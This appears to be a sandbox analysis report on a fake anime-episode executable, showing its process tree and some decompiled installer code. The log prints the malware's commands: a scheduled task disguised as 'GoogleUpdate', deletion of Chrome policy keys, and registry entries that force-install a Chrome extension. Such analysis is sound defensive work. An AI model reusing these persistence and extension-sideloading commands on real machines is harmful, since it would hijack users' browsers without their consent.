                                                                        Jan 2, 2023 15:35:55.126245022 CET | 8.8.8.8 | 192.168.2.6 | 0x66e1 | No error (0) | www.google.com | | 142.250.203.100 | A (IP address) | IN (0x0001) | false
                                                                        Jan 2, 2023 15:35:55.169292927 CET | 8.8.8.8 | 192.168.2.6 | 0x41f4 | No error (0) | www.google.com | | 142.250.203.100 | A (IP address) | IN (0x0001) | false

                                                                        Target ID:0
                                                                        Start time:15:34:36
                                                                        Start date:02/01/2023
                                                                        Path:C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe
                                                                        Imagebase:0x400000
                                                                        File size:25461096 bytes
                                                                        MD5 hash:71EABE2172181C2E4517C30C22CB6D12
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:Borland Delphi
                                                                        Reputation:low

                                                                        Target ID:1
                                                                        Start time:15:34:38
                                                                        Start date:02/01/2023
                                                                        Path:C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp" /SL5="$30408,24635135,780800,C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe"
                                                                        Imagebase:0x400000
                                                                        File size:3014144 bytes
                                                                        MD5 hash:F16A37D7AF3DB8C75F19AF9B3453D9C8
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:Borland Delphi
                                                                        Antivirus matches:
                                                                        • Detection: 0%, ReversingLabs
                                                                        Reputation:low

                                                                        Target ID:2
                                                                        Start time:15:34:40
                                                                        Start date:02/01/2023
                                                                        Path:C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe" /SILENT
                                                                        Imagebase:0x400000
                                                                        File size:25461096 bytes
                                                                        MD5 hash:71EABE2172181C2E4517C30C22CB6D12
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:Borland Delphi
                                                                        Reputation:low

                                                                        Target ID:3
                                                                        Start time:15:34:41
                                                                        Start date:02/01/2023
                                                                        Path:C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp" /SL5="$2040C,24635135,780800,C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe" /SILENT
                                                                        Imagebase:0x400000
                                                                        File size:3014144 bytes
                                                                        MD5 hash:F16A37D7AF3DB8C75F19AF9B3453D9C8
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:Borland Delphi
                                                                        Antivirus matches:
                                                                        • Detection: 0%, ReversingLabs
                                                                        Reputation:low

                                                                        Target ID:4
                                                                        Start time:15:34:48
                                                                        Start date:02/01/2023
                                                                        Path:C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exe" /install /quiet
                                                                        Imagebase:0x10000
                                                                        File size:25466016 bytes
                                                                        MD5 hash:703BD677778F2A1BA1EB4338BAC3B868
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate

                                                                        Target ID:5
                                                                        Start time:15:34:49
                                                                        Start date:02/01/2023
                                                                        Path:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe" -burn.clean.room="C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exe" -burn.filehandle.attached=588 -burn.filehandle.self=628 /install /quiet
                                                                        Imagebase:0xb0000
                                                                        File size:650568 bytes
                                                                        MD5 hash:848DA6B57CB8ACC151A8D64D15BA383D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Antivirus matches:
                                                                        • Detection: 0%, ReversingLabs
                                                                        Reputation:moderate

                                                                        Target ID:7
                                                                        Start time:15:34:56
                                                                        Start date:02/01/2023
                                                                        Path:C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{E9871BE9-995B-4EFF-BA27-126D1FC36700} {ED4F63C9-39F6-4A7D-A76D-4B8F059F42ED} 5372
                                                                        Imagebase:0xe70000
                                                                        File size:650568 bytes
                                                                        MD5 hash:848DA6B57CB8ACC151A8D64D15BA383D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Antivirus matches:
                                                                        • Detection: 0%, ReversingLabs
                                                                        Reputation:moderate

                                                                        Target ID:15
                                                                        Start time:15:34:59
                                                                        Start date:02/01/2023
                                                                        Path:C:\Windows\System32\msiexec.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\msiexec.exe /V
                                                                        Imagebase:0x7ff6dc900000
                                                                        File size:66048 bytes
                                                                        MD5 hash:4767B71A318E201188A0D0A420C8B608
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Target ID:16
                                                                        Start time:15:35:11
                                                                        Start date:02/01/2023
                                                                        Path:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe" /burn.runonce
                                                                        Imagebase:0x7ff603c50000
                                                                        File size:650568 bytes
                                                                        MD5 hash:848DA6B57CB8ACC151A8D64D15BA383D
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Antivirus matches:
                                                                        • Detection: 0%, ReversingLabs
                                                                        Reputation:moderate

                                                                        Target ID:17
                                                                        Start time:15:35:13
                                                                        Start date:02/01/2023
                                                                        Path:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe" /quiet /burn.log.append "C:\Users\user\AppData\Local\Temp\dd_vcredist_amd64_20230102153454.log" /install
                                                                        Imagebase:0xc20000
                                                                        File size:650568 bytes
                                                                        MD5 hash:848DA6B57CB8ACC151A8D64D15BA383D
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate

                                                                        Target ID:18
                                                                        Start time:15:35:14
                                                                        Start date:02/01/2023
                                                                        Path:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe" -burn.clean.room="C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe" -burn.filehandle.attached=588 -burn.filehandle.self=564 /quiet /burn.log.append "C:\Users\user\AppData\Local\Temp\dd_vcredist_amd64_20230102153454.log" /install
                                                                        Imagebase:0xc20000
                                                                        File size:650568 bytes
                                                                        MD5 hash:848DA6B57CB8ACC151A8D64D15BA383D
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language

                                                                        Target ID:19
                                                                        Start time:15:35:23
                                                                        Start date:02/01/2023
                                                                        Path:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=1008 -burn.embedded BurnPipe.{652D427C-3FCF-4F57-9B0A-0FFBCA2578FC} {CF7111B3-FF83-47BF-A56D-0E99B89A84C1} 5468
                                                                        Imagebase:0x10000
                                                                        File size:654624 bytes
                                                                        MD5 hash:CAA6E1DCAE648CE17BC57A5B7D383CC8
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        Target ID:20
                                                                        Start time:15:35:23
                                                                        Start date:02/01/2023
                                                                        Path:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -burn.clean.room="C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -burn.filehandle.attached=540 -burn.filehandle.self=564 -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=1008 -burn.embedded BurnPipe.{652D427C-3FCF-4F57-9B0A-0FFBCA2578FC} {CF7111B3-FF83-47BF-A56D-0E99B89A84C1} 5468
                                                                        Imagebase:0x10000
                                                                        File size:654624 bytes
                                                                        MD5 hash:CAA6E1DCAE648CE17BC57A5B7D383CC8
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        Target ID:25
                                                                        Start time:15:35:25
                                                                        Start date:02/01/2023
                                                                        Path:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{9F679354-B01C-4132-8C3B-9D0B8BAD9686} {7ADE5D70-631D-453D-B602-70E5C1B36EAF} 3732
                                                                        Imagebase:0xc20000
                                                                        File size:650568 bytes
                                                                        MD5 hash:848DA6B57CB8ACC151A8D64D15BA383D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        Target ID:27
                                                                        Start time:15:35:26
                                                                        Start date:02/01/2023
                                                                        Path:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=900 -burn.embedded BurnPipe.{8ADE75BE-8C64-4D11-B05A-A6C78AECD63F} {6EE058D7-D097-43E8-87F0-A357D97D5238} 1324
                                                                        Imagebase:0x10000
                                                                        File size:654624 bytes
                                                                        MD5 hash:CAA6E1DCAE648CE17BC57A5B7D383CC8
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        Target ID:28
                                                                        Start time:15:35:27
                                                                        Start date:02/01/2023
                                                                        Path:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -burn.clean.room="C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -burn.filehandle.attached=576 -burn.filehandle.self=572 -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=900 -burn.embedded BurnPipe.{8ADE75BE-8C64-4D11-B05A-A6C78AECD63F} {6EE058D7-D097-43E8-87F0-A357D97D5238} 1324
                                                                        Imagebase:0x10000
                                                                        File size:654624 bytes
                                                                        MD5 hash:CAA6E1DCAE648CE17BC57A5B7D383CC8
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        Target ID:29
                                                                        Start time:15:35:27
                                                                        Start date:02/01/2023
                                                                        Path:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{DC57C196-DCD2-4148-818F-F83AAF0E5C46} {63FE371D-956D-4D2B-988F-00929D1EE668} 2140
                                                                        Imagebase:0x10000
                                                                        File size:654624 bytes
                                                                        MD5 hash:CAA6E1DCAE648CE17BC57A5B7D383CC8
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        Target ID:30
                                                                        Start time:15:35:39
                                                                        Start date:02/01/2023
                                                                        Path:C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exe" install
                                                                        Imagebase:0x7ff6c2df0000
                                                                        File size:146560 bytes
                                                                        MD5 hash:6B435C6EA00DA06603EA9927D489AB6A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        Target ID:31
                                                                        Start time:15:35:40
                                                                        Start date:02/01/2023
                                                                        Path:C:\Windows\System32\cmd.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\WindowsApp\chrome.bat" "
                                                                        Imagebase:0x7ff7cb270000
                                                                        File size:273920 bytes
                                                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        Target ID:32
                                                                        Start time:15:35:40
                                                                        Start date:02/01/2023
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6da640000
                                                                        File size:625664 bytes
                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        Target ID:33
                                                                        Start time:15:35:41
                                                                        Start date:02/01/2023
                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:schtasks.exe /Create /XML "C:\Users\user\AppData\Local\WindowsApp\reg.xml" /tn GoogleUpdate
                                                                        Imagebase:0x7ff6b71a0000
                                                                        File size:226816 bytes
                                                                        MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        Target ID:34
                                                                        Start time:15:35:41
                                                                        Start date:02/01/2023
                                                                        Path:C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exe
                                                                        Imagebase:0x7ff6c2df0000
                                                                        File size:146560 bytes
                                                                        MD5 hash:6B435C6EA00DA06603EA9927D489AB6A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        Target ID:35
                                                                        Start time:15:35:41
                                                                        Start date:02/01/2023
                                                                        Path:C:\Windows\System32\cmd.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\WindowsApp\reg.bat" install
                                                                        Imagebase:0x7ff7cb270000
                                                                        File size:273920 bytes
                                                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        Target ID:36
                                                                        Start time:15:35:41
                                                                        Start date:02/01/2023
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6da640000
                                                                        File size:625664 bytes
                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        Target ID:37
                                                                        Start time:15:35:41
                                                                        Start date:02/01/2023
                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:schtasks.exe /Create /XML "C:\Users\user\AppData\Local\WindowsApp\reg.xml" /tn GoogleUpdate
                                                                        Imagebase:0x7ff6b71a0000
                                                                        File size:226816 bytes
                                                                        MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        Target ID:38
                                                                        Start time:15:35:43
                                                                        Start date:02/01/2023
                                                                        Path:C:\Windows\System32\cmd.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\WindowsApp\chrome.bat" "
                                                                        Imagebase:0x7ff7cb270000
                                                                        File size:273920 bytes
                                                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        Target ID:39
                                                                        Start time:15:35:43
                                                                        Start date:02/01/2023
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6da640000
                                                                        File size:625664 bytes
                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        Target ID:40
                                                                        Start time:15:35:43
                                                                        Start date:02/01/2023
                                                                        Path:C:\Windows\System32\reg.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:REG DELETE HKLM\SOFTWARE\Policies\Google\Chrome /f
                                                                        Imagebase:0x7ff6514a0000
                                                                        File size:72704 bytes
                                                                        MD5 hash:E3DACF0B31841FA02064B4457D44B357
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        Target ID:41
                                                                        Start time:15:35:43
                                                                        Start date:02/01/2023
                                                                        Path:C:\Windows\System32\reg.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:REG DELETE HKLM\SOFTWARE\Google\Chrome\Extensions\dbffglanhdhedkjkijpkplhpcdndpchj /f
                                                                        Imagebase:0x7ff6514a0000
                                                                        File size:72704 bytes
                                                                        MD5 hash:E3DACF0B31841FA02064B4457D44B357
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        Target ID:42
                                                                        Start time:15:35:44
                                                                        Start date:02/01/2023
                                                                        Path:C:\Windows\System32\reg.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:REG DELETE HKLM\SOFTWARE\WOW6432Node\Google\Chrome\Extensions\dbffglanhdhedkjkijpkplhpcdndpchj /f
                                                                        Imagebase:0x7ff6514a0000
                                                                        File size:72704 bytes
                                                                        MD5 hash:E3DACF0B31841FA02064B4457D44B357
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        Target ID:43
                                                                        Start time:15:35:44
                                                                        Start date:02/01/2023
                                                                        Path:C:\Windows\System32\reg.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:REG ADD "HKLM\SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist" /v "1" /t REG_SZ /d dbffglanhdhedkjkijpkplhpcdndpchj /f
                                                                        Imagebase:0x7ff6514a0000
                                                                        File size:72704 bytes
                                                                        MD5 hash:E3DACF0B31841FA02064B4457D44B357
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        Target ID:44
                                                                        Start time:15:35:45
                                                                        Start date:02/01/2023
                                                                        Path:C:\Windows\System32\reg.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:REG ADD "HKLM\SOFTWARE\Google\Chrome\Extensions\dbffglanhdhedkjkijpkplhpcdndpchj" /v "path" /t REG_SZ /d "C:\Users\user\AppData\Local\WindowsApp\apps-helper\apps.crx" /f
                                                                        Imagebase:0x7ff6514a0000
                                                                        File size:72704 bytes
                                                                        MD5 hash:E3DACF0B31841FA02064B4457D44B357
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        Target ID:45
                                                                        Start time:15:35:45
                                                                        Start date:02/01/2023
                                                                        Path:C:\Windows\System32\reg.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:REG ADD "HKLM\SOFTWARE\Google\Chrome\Extensions\dbffglanhdhedkjkijpkplhpcdndpchj" /v "version" /t REG_SZ /d 1.0 /f
                                                                        Imagebase:0x7ff6514a0000
                                                                        File size:72704 bytes
                                                                        MD5 hash:E3DACF0B31841FA02064B4457D44B357
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                          Control-flow Graph

                                                                          [Figure: control-flow graph of function E0001508D; legend: Executed / Not Executed]
                                                                          C-Code - Quality: 69%
                                                                          			E0001508D(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed short* _a20) {
                                                                          				signed int _v8;
                                                                          				signed short _v16;
                                                                          				struct _OSVERSIONINFOW _v292;
                                                                          				signed int _v296;
                                                                          				intOrPtr _v304;
                                                                          				signed short _v308;
                                                                          				intOrPtr _v312;
                                                                          				WCHAR* _v316;
                                                                          				WCHAR* _v320;
                                                                          				WCHAR* _v324;
                                                                          				WCHAR* _v328;
                                                                          				signed short* _v332;
                                                                          				char _v340;
                                                                          				char _v344;
                                                                          				signed short _v420;
                                                                          				intOrPtr _v576;
                                                                          				intOrPtr _v1316;
                                                                          				char _v1332;
                                                                          				signed short _v1340;
                                                                          				char _v1404;
                                                                          				intOrPtr _v1532;
                                                                          				intOrPtr _v1544;
                                                                          				signed short _v1564;
                                                                          				char _v1588;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t70;
                                                                          				void* _t83;
                                                                          				signed short _t85;
                                                                          				signed short _t87;
                                                                          				signed short _t88;
                                                                          				signed short _t89;
                                                                          				signed short _t90;
                                                                          				signed short _t91;
                                                                          				signed short _t93;
                                                                          				signed short _t99;
                                                                          				signed short _t101;
                                                                          				signed short _t103;
                                                                          				intOrPtr _t124;
                                                                          				signed short _t131;
                                                                          				signed short _t134;
                                                                          				signed short _t137;
                                                                          				signed short _t144;
                                                                          				signed short _t148;
                                                                          				void* _t149;
                                                                          				void* _t156;
                                                                          				signed short _t159;
                                                                          				signed short _t162;
                                                                          				signed short _t167;
                                                                          				signed short _t170;
                                                                          				signed int _t171;
                                                                          				void* _t172;
                                                                          				void* _t173;
                                                                          
                                                                          				_t156 = __edx;
                                                                          				_t149 = __ecx;
                                                                          				_t70 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t70 ^ _t171;
                                                                          				_t148 = 0;
                                                                          				_t157 = _a8;
                                                                          				_v304 = _a4;
                                                                          				_v332 = _a20;
                                                                          				_v312 = _a12;
                                                                          				_v328 = 0;
                                                                          				_v324 = 0;
                                                                          				_v320 = 0;
                                                                          				_v316 = 0;
                                                                          				E0003F670(_a8,  &_v292, 0, 0x11c);
                                                                          				_v296 = 0;
                                                                          				_v308 = 0;
                                                                          				E0003F670(_a8,  &_v1588, 0, 0x4e8);
                                                                          				_t173 = _t172 + 0x18;
                                                                          				E000503F0(GetModuleHandleW(0));
                                                                          				E000505A2(3, 0);
                                                                          				_t83 = E00011209(_t149, _a12,  &_v344,  &_v340); // executed
                                                                          				if(_t83 >= 0) {
                                                                          					_t85 = E000141D2(_t149, _t156, __eflags,  &_v1588, _t157); // executed
                                                                          					_t162 = _t85;
                                                                          					__eflags = _t162;
                                                                          					if(_t162 >= 0) {
                                                                          						_v1544 = _a16;
                                                                          						_t87 = E00015525();
                                                                          						__imp__CoInitializeEx(0, 0); // executed
                                                                          						_t162 = _t87;
                                                                          						__eflags = _t162;
                                                                          						if(_t162 >= 0) {
                                                                          							_t159 = 1;
                                                                          							_t88 = E0004FBAD();
                                                                          							__eflags = _t88;
                                                                          							if(_t88 >= 0) {
                                                                          								_v328 = 1;
                                                                          								_t89 = E00050CD1();
                                                                          								_t164 = _t89;
                                                                          								__eflags = _t89;
                                                                          								if(__eflags >= 0) {
                                                                          									_v324 = 1;
                                                                          									_t90 = E000529B3(_t149, _t156, _t164, __eflags); // executed
                                                                          									__eflags = _t90;
                                                                          									if(_t90 >= 0) {
                                                                          										_v320 = 1;
                                                                          										_t91 = E0005343B(_t90);
                                                                          										__eflags = _t91;
                                                                          										if(_t91 >= 0) {
                                                                          											_v316 = 1;
                                                                          											_v292.dwOSVersionInfoSize = 0x11c;
                                                                          											_t93 = GetVersionExW( &_v292);
                                                                          											__eflags = _t93;
                                                                          											if(_t93 != 0) {
                                                                          												E000133D7( &_v296, 0);
                                                                          												_push(_v296);
                                                                          												_push(_v16 & 0x0000ffff);
                                                                          												_push(_v292.dwBuildNumber);
                                                                          												_push(_v292.dwMinorVersion);
                                                                          												_push(_v292.dwMajorVersion);
                                                                          												E0001550F(2, 0x20000001, "3.10.4.4718");
                                                                          												_t173 = _t173 + 0x20;
                                                                          												__eflags = _v296;
                                                                          												if(__eflags != 0) {
                                                                          													E000554EF(_v296);
                                                                          													_t36 =  &_v296;
                                                                          													 *_t36 = _v296 & 0;
                                                                          													__eflags =  *_t36;
                                                                          												}
                                                                          												_t99 = E00027337(_t156, __eflags,  &_v1588); // executed
                                                                          												_t167 = _t99;
                                                                          												__eflags = _t167;
                                                                          												if(_t167 >= 0) {
                                                                          													_t101 = _v420;
                                                                          													__eflags = _t101;
                                                                          													if(_t101 == 0) {
                                                                          														_t103 = E00014C33(_t156, _v312,  &_v1588); // executed
                                                                          														_t167 = _t103;
                                                                          														__eflags = _t167;
                                                                          														if(_t167 >= 0) {
                                                                          															L38:
                                                                          															_t150 = _v332;
                                                                          															_t148 = _v1564;
                                                                          															 *_v332 = _v1340;
                                                                          															goto L39;
                                                                          														}
                                                                          														_push("Failed to run untrusted mode.");
                                                                          														goto L9;
                                                                          													}
                                                                          													_t131 = _t101 - 1;
                                                                          													__eflags = _t131;
                                                                          													if(_t131 == 0) {
                                                                          														_v308 = _t159;
                                                                          														_t167 = E000149DF(_t149, _t156, _v304,  &_v1588);
                                                                          														__eflags = _t167;
                                                                          														if(_t167 >= 0) {
                                                                          															goto L38;
                                                                          														}
                                                                          														_push("Failed to run per-user mode.");
                                                                          														goto L9;
                                                                          													}
                                                                          													_t134 = _t131 - 1;
                                                                          													__eflags = _t134;
                                                                          													if(_t134 == 0) {
                                                                          														_t167 = E000147E9(_t149, _t156, _v304, _v312,  &_v1588);
                                                                          														__eflags = _t167;
                                                                          														if(_t167 >= 0) {
                                                                          															goto L38;
                                                                          														}
                                                                          														_push("Failed to run per-machine mode.");
                                                                          														goto L9;
                                                                          													}
                                                                          													_t137 = _t134 - 1;
                                                                          													__eflags = _t137;
                                                                          													if(_t137 == 0) {
                                                                          														_v308 = _t159;
                                                                          														_t167 = E00014982(_t149, _t156, _v304,  &_v1588);
                                                                          														__eflags = _t167;
                                                                          														if(_t167 >= 0) {
                                                                          															goto L38;
                                                                          														}
                                                                          														_push("Failed to run embedded mode.");
                                                                          														goto L9;
                                                                          													}
                                                                          													__eflags = _t137 == 1;
                                                                          													if(_t137 == 1) {
                                                                          														_t167 = E00014B80(_t149,  &_v1332, _a16);
                                                                          														__eflags = _t167;
                                                                          														if(_t167 >= 0) {
                                                                          															goto L38;
                                                                          														}
                                                                          														_push("Failed to run RunOnce mode.");
                                                                          														goto L9;
                                                                          													}
                                                                          													_t167 = 0x8000ffff;
                                                                          													_push("Invalid run mode.");
                                                                          													goto L9;
